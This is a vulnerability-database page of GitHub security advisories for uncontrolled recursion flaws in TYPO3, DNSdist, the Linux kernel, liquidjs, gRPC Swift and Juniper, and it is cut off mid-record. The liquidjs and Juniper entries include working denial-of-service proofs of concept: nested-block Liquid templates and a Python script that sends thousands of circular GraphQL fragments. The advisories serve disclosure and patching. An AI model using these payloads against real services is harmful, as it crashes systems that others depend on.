Common Weakness Enumeration

CWE-674

Allowed-with-Review

Uncontrolled Recursion

Abstraction: Class · Status: Draft

The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.

616 vulnerabilities reference this CWE, most recent first.

GHSA-4P9G-QGX9-397P

Vulnerability from github – Published: 2021-03-23 01:54 – Updated: 2024-02-07 18:50
VLAI
Summary
Denial of Service in Page Error Handling
Details

Meta

  • CVSS: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C (5.5)
  • CWE-405, CWE-674
  • Status: DRAFT

Problem

Requesting invalid or non-existing resources via HTTP triggers the page error handler which again could retrieve content to be shown as error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded.

Solution

Update to TYPO3 versions 9.5.25, 10.4.14, 11.1.1 that fix the problem described.

Credits

Thanks to Paul Keller, Mathias Bolt Lesniak and Kay Strobach who reported this issue and to TYPO3 framework merger Frank Nägler and to TYPO3 security team member Torben Hansen who fixed the issue.

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.4.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0"
            },
            {
              "fixed": "11.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.5.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.4.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0"
            },
            {
              "fixed": "11.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.5.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-405",
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-23T01:42:10Z",
    "nvd_published_at": "2021-03-23T02:15:00Z",
    "severity": "MODERATE"
  },
  "details": "\u003e ### Meta\n\u003e * CVSS:  `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C` (5.5)\n\u003e * CWE-405, CWE-674\n\u003e * Status: **DRAFT**\n\n### Problem\nRequesting invalid or non-existing resources via HTTP triggers the page error handler which again could retrieve content  to be shown as error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded.\n\n### Solution\nUpdate to TYPO3 versions 9.5.25, 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to Paul Keller, Mathias Bolt Lesniak and Kay Strobach who reported this issue and to TYPO3 framework merger Frank N\u00e4gler and to TYPO3 security team member Torben Hansen who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-005](https://typo3.org/security/advisory/typo3-core-sa-2021-005)",
  "id": "GHSA-4p9g-qgx9-397p",
  "modified": "2024-02-07T18:50:34Z",
  "published": "2021-03-23T01:54:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-4p9g-qgx9-397p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21359.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21359.yaml"
    },
    {
      "type": "WEB",
      "url": "https://packagist.org/packages/typo3/cms-core"
    },
    {
      "type": "WEB",
      "url": "https://typo3.org/security/advisory/typo3-core-sa-2021-005"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Denial of Service in Page Error Handling"
}

GHSA-4Q3H-V92P-GCHJ

Vulnerability from github – Published: 2025-05-20 12:30 – Updated: 2025-05-20 12:30
VLAI
Details

In some circumstances, when DNSdist is configured to allow an unlimited number of queries on a single, incoming TCP connection from a client, an attacker can cause a denial of service by crafting a TCP exchange that triggers an exhaustion of the stack and a crash of DNSdist, causing a denial of service.

The remedy is: upgrade to the patched 1.9.10 version.

A workaround is to restrict the maximum number of queries on incoming TCP connections to a safe value, like 50, via the setMaxTCPQueriesPerConnection setting.

We would like to thank Renaud Allard for bringing this issue to our attention.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-30193"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-20T12:15:19Z",
    "severity": "HIGH"
  },
  "details": "In some circumstances, when DNSdist is configured to allow an unlimited number of queries on a single, incoming TCP connection from a client, an attacker can cause a denial of service by crafting a TCP exchange that triggers an exhaustion of the stack and a crash of DNSdist, causing a denial of service.\n\nThe remedy is: upgrade to the patched 1.9.10 version.\n\nA workaround is to restrict the maximum number of queries on incoming TCP connections to a safe value, like 50, via the setMaxTCPQueriesPerConnection setting.\n\nWe would like to thank Renaud Allard for bringing this issue to our attention.",
  "id": "GHSA-4q3h-v92p-gchj",
  "modified": "2025-05-20T12:30:23Z",
  "published": "2025-05-20T12:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30193"
    },
    {
      "type": "WEB",
      "url": "https://dnsdist.org/security-advisories/powerdns-advisory-for-dnsdist-2025-03.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4QP6-H6GX-PGM5

Vulnerability from github – Published: 2025-07-25 18:30 – Updated: 2025-12-23 00:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

atm: clip: Fix infinite recursive call of clip_push().

syzbot reported the splat below. [0]

This happens if we call ioctl(ATMARP_MKIP) more than once.

During the first call, clip_mkip() sets clip_push() to vcc->push(), and the second call copies it to clip_vcc->old_push().

Later, when the socket is close()d, vcc_destroy_socket() passes NULL skb to clip_push(), which calls clip_vcc->old_push(), triggering the infinite recursion.

Let's prevent the second ioctl(ATMARP_MKIP) by checking vcc->user_back, which is allocated by the first call as clip_vcc.

Note also that we use lock_sock() to prevent racy calls.

[0]: BUG: TASK stack guard page was hit at ffffc9000d66fff8 (stack is ffffc9000d670000..ffffc9000d678000) Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI CPU: 0 UID: 0 PID: 5322 Comm: syz.0.0 Not tainted 6.16.0-rc4-syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:clip_push+0x5/0x720 net/atm/clip.c:191 Code: e0 8f aa 8c e8 1c ad 5b fa eb ae 66 2e 0f 1f 84 00 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 <41> 57 41 56 41 55 41 54 53 48 83 ec 20 48 89 f3 49 89 fd 48 bd 00 RSP: 0018:ffffc9000d670000 EFLAGS: 00010246 RAX: 1ffff1100235a4a5 RBX: ffff888011ad2508 RCX: ffff8880003c0000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff888037f01000 RBP: dffffc0000000000 R08: ffffffff8fa104f7 R09: 1ffffffff1f4209e R10: dffffc0000000000 R11: ffffffff8a99b300 R12: ffffffff8a99b300 R13: ffff888037f01000 R14: ffff888011ad2500 R15: ffff888037f01578 FS: 000055557ab6d500(0000) GS:ffff88808d250000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffc9000d66fff8 CR3: 0000000043172000 CR4: 0000000000352ef0 Call Trace: clip_push+0x6dc/0x720 net/atm/clip.c:200 clip_push+0x6dc/0x720 net/atm/clip.c:200 clip_push+0x6dc/0x720 net/atm/clip.c:200 ... clip_push+0x6dc/0x720 net/atm/clip.c:200 clip_push+0x6dc/0x720 net/atm/clip.c:200 clip_push+0x6dc/0x720 net/atm/clip.c:200 vcc_destroy_socket net/atm/common.c:183 [inline] vcc_release+0x157/0x460 net/atm/common.c:205 __sock_release net/socket.c:647 [inline] sock_close+0xc0/0x240 net/socket.c:1391 __fput+0x449/0xa70 fs/file_table.c:465 task_work_run+0x1d1/0x260 kernel/task_work.c:227 resume_user_mode_work include/linux/resume_user_mode.h:50 [inline] exit_to_user_mode_loop+0xec/0x110 kernel/entry/common.c:114 exit_to_user_mode_prepare include/linux/entry-common.h:330 [inline] syscall_exit_to_user_mode_work include/linux/entry-common.h:414 [inline] syscall_exit_to_user_mode include/linux/entry-common.h:449 [inline] do_syscall_64+0x2bd/0x3b0 arch/x86/entry/syscall_64.c:100 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7ff31c98e929 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fffb5aa1f78 EFLAGS: 00000246 ORIG_RAX: 00000000000001b4 RAX: 0000000000000000 RBX: 0000000000012747 RCX: 00007ff31c98e929 RDX: 0000000000000000 RSI: 000000000000001e RDI: 0000000000000003 RBP: 00007ff31cbb7ba0 R08: 0000000000000001 R09: 0000000db5aa226f R10: 00007ff31c7ff030 R11: 0000000000000246 R12: 00007ff31cbb608c R13: 00007ff31cbb6080 R14: ffffffffffffffff R15: 00007fffb5aa2090 Modules linked in:

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-38459"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-25T16:15:31Z",
    "severity": "HIGH"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\natm: clip: Fix infinite recursive call of clip_push().\n\nsyzbot reported the splat below. [0]\n\nThis happens if we call ioctl(ATMARP_MKIP) more than once.\n\nDuring the first call, clip_mkip() sets clip_push() to vcc-\u003epush(),\nand the second call copies it to clip_vcc-\u003eold_push().\n\nLater, when the socket is close()d, vcc_destroy_socket() passes\nNULL skb to clip_push(), which calls clip_vcc-\u003eold_push(),\ntriggering the infinite recursion.\n\nLet\u0027s prevent the second ioctl(ATMARP_MKIP) by checking\nvcc-\u003euser_back, which is allocated by the first call as clip_vcc.\n\nNote also that we use lock_sock() to prevent racy calls.\n\n[0]:\nBUG: TASK stack guard page was hit at ffffc9000d66fff8 (stack is ffffc9000d670000..ffffc9000d678000)\nOops: stack guard page: 0000 [#1] SMP KASAN NOPTI\nCPU: 0 UID: 0 PID: 5322 Comm: syz.0.0 Not tainted 6.16.0-rc4-syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:clip_push+0x5/0x720 net/atm/clip.c:191\nCode: e0 8f aa 8c e8 1c ad 5b fa eb ae 66 2e 0f 1f 84 00 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 \u003c41\u003e 57 41 56 41 55 41 54 53 48 83 ec 20 48 89 f3 49 89 fd 48 bd 00\nRSP: 0018:ffffc9000d670000 EFLAGS: 00010246\nRAX: 1ffff1100235a4a5 RBX: ffff888011ad2508 RCX: ffff8880003c0000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff888037f01000\nRBP: dffffc0000000000 R08: ffffffff8fa104f7 R09: 1ffffffff1f4209e\nR10: dffffc0000000000 R11: ffffffff8a99b300 R12: ffffffff8a99b300\nR13: ffff888037f01000 R14: ffff888011ad2500 R15: ffff888037f01578\nFS:  000055557ab6d500(0000) GS:ffff88808d250000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffffc9000d66fff8 CR3: 0000000043172000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n clip_push+0x6dc/0x720 net/atm/clip.c:200\n clip_push+0x6dc/0x720 net/atm/clip.c:200\n clip_push+0x6dc/0x720 net/atm/clip.c:200\n...\n clip_push+0x6dc/0x720 net/atm/clip.c:200\n clip_push+0x6dc/0x720 net/atm/clip.c:200\n clip_push+0x6dc/0x720 net/atm/clip.c:200\n vcc_destroy_socket net/atm/common.c:183 [inline]\n vcc_release+0x157/0x460 net/atm/common.c:205\n __sock_release net/socket.c:647 [inline]\n sock_close+0xc0/0x240 net/socket.c:1391\n __fput+0x449/0xa70 fs/file_table.c:465\n task_work_run+0x1d1/0x260 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop+0xec/0x110 kernel/entry/common.c:114\n exit_to_user_mode_prepare include/linux/entry-common.h:330 [inline]\n syscall_exit_to_user_mode_work include/linux/entry-common.h:414 [inline]\n syscall_exit_to_user_mode include/linux/entry-common.h:449 [inline]\n do_syscall_64+0x2bd/0x3b0 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7ff31c98e929\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fffb5aa1f78 EFLAGS: 00000246 ORIG_RAX: 00000000000001b4\nRAX: 0000000000000000 RBX: 0000000000012747 RCX: 00007ff31c98e929\nRDX: 0000000000000000 RSI: 000000000000001e RDI: 0000000000000003\nRBP: 00007ff31cbb7ba0 R08: 0000000000000001 R09: 0000000db5aa226f\nR10: 00007ff31c7ff030 R11: 0000000000000246 R12: 00007ff31cbb608c\nR13: 00007ff31cbb6080 R14: ffffffffffffffff R15: 00007fffb5aa2090\n \u003c/TASK\u003e\nModules linked in:",
  "id": "GHSA-4qp6-h6gx-pgm5",
  "modified": "2025-12-23T00:30:30Z",
  "published": "2025-07-25T18:30:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38459"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/024876b247a882972095b22087734dcd23396a4e"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/125166347d5676466d368aadc0bbc31ee7714352"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/1579a2777cb914a249de22c789ba4d41b154509f"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/3f61b997fe014bbfcc208a9fcbd363a1fe7e3a31"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/5641019dfbaee5e85fe093b590f0451c9dd4d6f8"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c489f3283dbfc0f3c00c312149cae90d27552c45"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/df0312d8859763aa15b8b56ac151a1ea4a4e5b88"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/f493f31a63847624fd3199ac836a8bd8828e50e2"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00008.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RC3-7J7W-M548

Vulnerability from github – Published: 2026-04-24 15:34 – Updated: 2026-05-13 13:38
VLAI
Summary
liquidjs has a Denial of Service via circular block reference in layout
Details

Summary

A circular block reference in {% layout %} / {% block %} causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with FATAL ERROR: JavaScript heap out of memory. This allows any user who can submit a Liquid template to perform a Denial of Service attack.

Details

In src/tags/block.ts, during OUTPUT mode, each block looks up its render function from ctx.getRegister('blocks')[this.block]. When a block with name a is nested inside another block also named a in a child template, the inner block finds the outer block's render function and calls it. The outer block's templates contain the inner block again, creating infinite recursion with no termination condition.

Relevant code (src/tags/block.ts, getBlockRender method):

private getBlockRender (ctx: Context) {
  const { liquid, templates } = this
  const renderChild = ctx.getRegister('blocks')[this.block]
  const renderCurrent = function * (superBlock: BlockDrop, emitter: Emitter) {
    ctx.push({ block: superBlock })
    yield liquid.renderer.renderTemplates(templates, ctx, emitter)
    ctx.pop()
  }
  return renderChild
    ? (superBlock: BlockDrop, emitter: Emitter) => renderChild(
        new BlockDrop(
          (emitter: Emitter) => renderCurrent(superBlock, emitter)
        ),
        emitter)
    : renderCurrent
}

When renderChild exists (same-name block found), it calls renderChild which re-renders templates containing the nested block, which again finds renderChild, and so on — infinite loop.

PoC

1. Create a layout file (layout.html):

<header>{% block a %}default-a{% endblock %}</header>
<main>{% block b %}default-b{% endblock %}</main>
<footer>{% block c %}default-c{% endblock %}</footer>

2. Create a template that uses the layout:

{% layout "layout" %}
{% block a %}outer-a {% block a %}inner-a{% endblock %}{% endblock %}
{% block b %}content-b{% endblock %}
{% block c %}content-c{% endblock %}

3. Render:

const { Liquid } = require('liquidjs')
const liquid = new Liquid({ root: './', extname: '.html' })
liquid.renderFile('template').then(console.log)
// Result: process hangs, memory grows to ~4GB, then crashes with OOM

The anonymous block variant also triggers the same issue:

{% layout "parent" %}
{%block%}A{%block%}B{%endblock%}{%endblock%}

Impact

Denial of Service (DoS). Any application that accepts user-provided or user-influenced Liquid templates — such as CMS platforms, email template builders, multi-tenant SaaS products, or static site generators with untrusted input — can be crashed by a single malicious template. The attack requires no authentication beyond the ability to submit a template, and no special configuration. The Node.js process is killed by the OS due to memory exhaustion, causing complete service disruption.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "liquidjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.25.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41311"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-24T15:34:00Z",
    "nvd_published_at": "2026-05-09T04:16:21Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA circular block reference in `{% layout %}` / `{% block %}` causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with `FATAL ERROR: JavaScript heap out of memory`. This allows any user who can submit a Liquid template to perform a Denial of Service attack.\n\n### Details\n\nIn `src/tags/block.ts`, during OUTPUT mode, each block looks up its render function from `ctx.getRegister(\u0027blocks\u0027)[this.block]`. When a block with name `a` is nested inside another block also named `a` in a child template, the inner block finds the outer block\u0027s render function and calls it. The outer block\u0027s templates contain the inner block again, creating infinite recursion with no termination condition.\n\nRelevant code (`src/tags/block.ts`, `getBlockRender` method):\n\n```typescript\nprivate getBlockRender (ctx: Context) {\n  const { liquid, templates } = this\n  const renderChild = ctx.getRegister(\u0027blocks\u0027)[this.block]\n  const renderCurrent = function * (superBlock: BlockDrop, emitter: Emitter) {\n    ctx.push({ block: superBlock })\n    yield liquid.renderer.renderTemplates(templates, ctx, emitter)\n    ctx.pop()\n  }\n  return renderChild\n    ? (superBlock: BlockDrop, emitter: Emitter) =\u003e renderChild(\n        new BlockDrop(\n          (emitter: Emitter) =\u003e renderCurrent(superBlock, emitter)\n        ),\n        emitter)\n    : renderCurrent\n}\n```\n\nWhen `renderChild` exists (same-name block found), it calls `renderChild` which re-renders templates containing the nested block, which again finds `renderChild`, and so on \u2014 infinite loop.\n\n### PoC\n\n**1. Create a layout file** (`layout.html`):\n\n```liquid\n\u003cheader\u003e{% block a %}default-a{% endblock %}\u003c/header\u003e\n\u003cmain\u003e{% block b %}default-b{% endblock %}\u003c/main\u003e\n\u003cfooter\u003e{% block c %}default-c{% endblock %}\u003c/footer\u003e\n```\n\n**2. Create a template that uses the layout:**\n\n```liquid\n{% layout \"layout\" %}\n{% block a %}outer-a {% block a %}inner-a{% endblock %}{% endblock %}\n{% block b %}content-b{% endblock %}\n{% block c %}content-c{% endblock %}\n```\n\n**3. Render:**\n\n```javascript\nconst { Liquid } = require(\u0027liquidjs\u0027)\nconst liquid = new Liquid({ root: \u0027./\u0027, extname: \u0027.html\u0027 })\nliquid.renderFile(\u0027template\u0027).then(console.log)\n// Result: process hangs, memory grows to ~4GB, then crashes with OOM\n```\n\nThe anonymous block variant also triggers the same issue:\n\n```liquid\n{% layout \"parent\" %}\n{%block%}A{%block%}B{%endblock%}{%endblock%}\n```\n\n### Impact\n\n**Denial of Service (DoS).** Any application that accepts user-provided or user-influenced Liquid templates \u2014 such as CMS platforms, email template builders, multi-tenant SaaS products, or static site generators with untrusted input \u2014 can be crashed by a single malicious template. The attack requires no authentication beyond the ability to submit a template, and no special configuration. The Node.js process is killed by the OS due to memory exhaustion, causing complete service disruption.",
  "id": "GHSA-4rc3-7j7w-m548",
  "modified": "2026-05-13T13:38:38Z",
  "published": "2026-04-24T15:34:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-4rc3-7j7w-m548"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41311"
    },
    {
      "type": "WEB",
      "url": "https://github.com/harttle/liquidjs/commit/e2311dfd6e82f73509308aa8a3a1fafc92e226f0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/harttle/liquidjs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/harttle/liquidjs/releases/tag/v10.25.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "liquidjs has a Denial of Service via circular block reference in layout"
}

GHSA-4RHQ-VQ24-88GW

Vulnerability from github – Published: 2023-05-22 20:29 – Updated: 2023-05-22 20:29
VLAI
Summary
Uncontrolled Recursion in HTTP2ToRawGRPCServerCodec
Details

Impact

Affected gRPC Swift servers are vulnerable to uncontrolled recursion and stack consumption when parsing certain payloads. This may lead to a denial of service.

Patches

The problem has been fixed in 1.2.0.

Workarounds

No workaround is available. Users must upgrade.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "SwiftURL",
        "name": "github.com/grpc/grpc-swift"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-36154"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-05-22T20:29:44Z",
    "nvd_published_at": "2021-07-09T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nAffected gRPC Swift servers are vulnerable to uncontrolled recursion and stack consumption when parsing certain payloads. This may lead to a denial of service.\n\n### Patches\n\nThe problem has been fixed in 1.2.0.\n\n### Workarounds\n\nNo workaround is available. Users must upgrade.",
  "id": "GHSA-4rhq-vq24-88gw",
  "modified": "2023-05-22T20:29:44Z",
  "published": "2023-05-22T20:29:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/grpc/grpc-swift/security/advisories/GHSA-4rhq-vq24-88gw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36154"
    },
    {
      "type": "WEB",
      "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=35274"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/grpc/grpc-swift"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grpc/grpc-swift/releases/tag/1.2.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Uncontrolled Recursion in HTTP2ToRawGRPCServerCodec"
}

GHSA-4RX6-G5VG-5F3J

Vulnerability from github – Published: 2022-07-29 22:29 – Updated: 2022-07-29 22:29
VLAI
Summary
Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow
Details

GraphQL behaviour

Nested fragment in GraphQL might be quite hard to handle depending on the implementation language. Some language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion.

# Infinite loop example
query {
    ...a
}

fragment a on Query {
    ...b
}

fragment b on Query {
    ...a
}

POC TLDR

With max_size being the number of nested fragment generated. At max_size=7500, it should instantly raise:

However, with a lower size, you will overflow the memory after some iterations.

Reproduction steps (Juniper)

git clone https://github.com/graphql-rust/juniper.git
cd juniper

Save this POC as poc.py

import requests
import time
import json
from itertools import permutations

print('=== Fragments POC ===')

url = 'http://localhost:8080/graphql'

max_size = 7500
perms = [''.join(p) for p in permutations('abcefghijk')]
perms = perms[:max_size]

fragment_payloads = ''
for i, perm in enumerate(perms):
    next_perm = perms[i+1] if i < max_size-1 else perms[0]
    fragment_payloads += f'fragment {perm} on Query' + '{' f'...{next_perm}' + '}'

payload = {'query':'query{\n  ...' + perms[0] + '\n}' + fragment_payloads,'variables':{},'operationName':None}

headers = {
  'Content-Type': 'application/json',
}

try:
    response = requests.request('POST', url, headers=headers, json=payload)
    print(response.text)
except requests.exceptions.ConnectionError:
    print('Connection closed, POC worked.')
cargo run
[in separate shell] python3 poc.py

Credits

@Escape-Technologies

@c3b5aw @MdotTIM @karimhreda

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "juniper"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.15.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-31173"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-29T22:29:22Z",
    "nvd_published_at": "2022-08-01T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "### GraphQL behaviour\n\nNested fragment in GraphQL might be quite hard to handle depending on the implementation language.\nSome language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion.\n\n```graphql\n# Infinite loop example\nquery {\n    ...a\n}\n\nfragment a on Query {\n    ...b\n}\n\nfragment b on Query {\n    ...a\n}\n```\n\n### POC TLDR\nWith max_size being the number of nested fragment generated.\nAt max_size=7500, it should instantly raise:\n\n![](https://i.imgur.com/wXbUx8l.png)\n\nHowever, with a lower size, you will overflow the memory after some iterations.\n\n### Reproduction steps (Juniper)\n\n```\ngit clone https://github.com/graphql-rust/juniper.git\ncd juniper\n```\n\nSave this POC as poc.py\n\n```python\nimport requests\nimport time\nimport json\nfrom itertools import permutations\n\nprint(\u0027=== Fragments POC ===\u0027)\n\nurl = \u0027http://localhost:8080/graphql\u0027\n\nmax_size = 7500\nperms = [\u0027\u0027.join(p) for p in permutations(\u0027abcefghijk\u0027)]\nperms = perms[:max_size]\n\nfragment_payloads = \u0027\u0027\nfor i, perm in enumerate(perms):\n    next_perm = perms[i+1] if i \u003c max_size-1 else perms[0]\n    fragment_payloads += f\u0027fragment {perm} on Query\u0027 + \u0027{\u0027 f\u0027...{next_perm}\u0027 + \u0027}\u0027\n\npayload = {\u0027query\u0027:\u0027query{\\n  ...\u0027 + perms[0] + \u0027\\n}\u0027 + fragment_payloads,\u0027variables\u0027:{},\u0027operationName\u0027:None}\n\nheaders = {\n  \u0027Content-Type\u0027: \u0027application/json\u0027,\n}\n\ntry:\n    response = requests.request(\u0027POST\u0027, url, headers=headers, json=payload)\n    print(response.text)\nexcept requests.exceptions.ConnectionError:\n    print(\u0027Connection closed, POC worked.\u0027)\n```\n\n```\ncargo run\n[in separate shell] python3 poc.py\n```\n\n### Credits\n\n[@Escape-Technologies](https://escape.tech)\n\n@c3b5aw \n@MdotTIM \n@karimhreda \n",
  "id": "GHSA-4rx6-g5vg-5f3j",
  "modified": "2022-07-29T22:29:22Z",
  "published": "2022-07-29T22:29:22Z",
  "references": [
    {
      "type": "WEB",
